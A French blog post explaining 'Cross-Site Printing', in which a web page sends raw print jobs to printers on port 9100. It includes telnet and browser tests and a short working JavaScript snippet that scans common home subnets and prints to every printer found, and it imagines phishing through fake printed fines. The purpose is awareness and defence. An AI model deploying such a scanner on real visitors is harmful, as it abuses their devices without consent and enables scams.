[Imprimantes] « Contrôlez » n’importe quelle imprimante

 

Heeelloooo,

 

Alors d'accord, je vous l'accorde, le titre laisse plutôt rêveur, mais je ne trouvais pas de titre "court" et "accrocheur".
Je vais aujourd'hui vous parler de quelque chose qui n'est pas nouveau, mais qui nous touche presque tous !

Nos imprimantes !!!

Imaginez que vous alliez consulter un site Web ... et que votre imprimante  se mette à imprimer ...
Ou bien qu'au contraire en consultant une simple page Web, vous ne puissiez plus imprimer !
Pire encore ... imaginez que le site Web que vous consultez puisse savoir ce que vous êtes en train d'imprimer ?

 

Magie ?

 

Non, il ne s'agit pas là d'un sort démoniaque lancé à votre imprimante, il s'agit d'une attaque qui porte le nom de "CSP" (Cross-Site-Printing)

 

Comment ça marche ?

 

Tout commence par le port 9100, normalement utilisé par toutes les imprimantes.
Celui-ci est le port d'échange TCP qui permet d'envoyer des données à imprimer en brut (raw).
Au travers de ce port, vous pouvez depuis plusieurs devices (ordinateur, smartphone, etc ...) imprimer une même page.

Si vous connaissez l'adresse IP de votre imprimante, alors vous pourrez tester les choses suivantes :

  1. Ouvrir une page dans votre navigateur : http://<ip de votre imprimante>:9100
  2. Ouvrir une console : telnet <ip de votre imprimante> 9100
  3.  etc ...

Normalement, vous devriez voir votre imprimante se mettre à imprimer toute seule.
Si vous avez testé en ouvrant une page Web, vous devriez la voir "mouliner" / "charger"
tant que vous gardez cette page ouverte, personne ne pourra imprimer (autrement qu'en passant par le port 9100)

 

Les risques

 

Nous nous rapprochons de plus en plus de ce jour où les maisons seront toutes connectées.
Où vous pourrez depuis une application, une page Web, votre éclairage, votre chaîne Hifi, ...
Néanmoins, une imprimante n'est pas vraiment de la domotique, mais c'est un matériel qui est connecté sur le réseau dans la plupart des maisons.

Il est à prévoir, que des personnes vulnérables se retrouvent face à une phishing 2.0

Une page Web se faisant passer pour la gendarmerie, imprimant une amende directement.

 

La démo

J'ai écrit rapidement un code qui va balayer vos adresses IP "locale" (du moins celles par défaut)

De 192.168.1.1 à 192.168.1.254 (Orange, Sfr, Bouygues, ...)
De 192.168.0.1 à 192.168.0.254 (Free, ...)

Et qui va envoyer des choses à imprimer sur le port 9100.

Lien Demo XSP

PS : Avant de dire que ça ne fonctionne pas, vérifiez que l'imprimante est connectée sur votre réseau, et que l'ordinateur ou le smartphone sur lequel vous consultez le lien est lui aussi sur le même réseau (Wifi, filaire) ;)

 

 

Le script

Voici un petit script minimaliste qui fait le taff pour vous

var msg =`
	
		Texte à Imprimer
			Hello
			World
			 <3

`;
["192.168.1.","192.168.0."].map(function(e){
	for (var i = 1;i<254;i++){
		var z = new XMLHttpRequest();
		z.open('post',['http://',e,i,':',9100].join(''));
		z.send(msg)
	}		
});

 

 

Conclusion

Une imprimante qui n'est pas sur le réseau ce n'est pas pratique mais c'est sécurisé.
Si votre imprimante se met à imprimer des trucs toute seule vous incitant à payer ... n'y
prêtez pas attention.

 

Partagez ce contenu

Laisser une réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *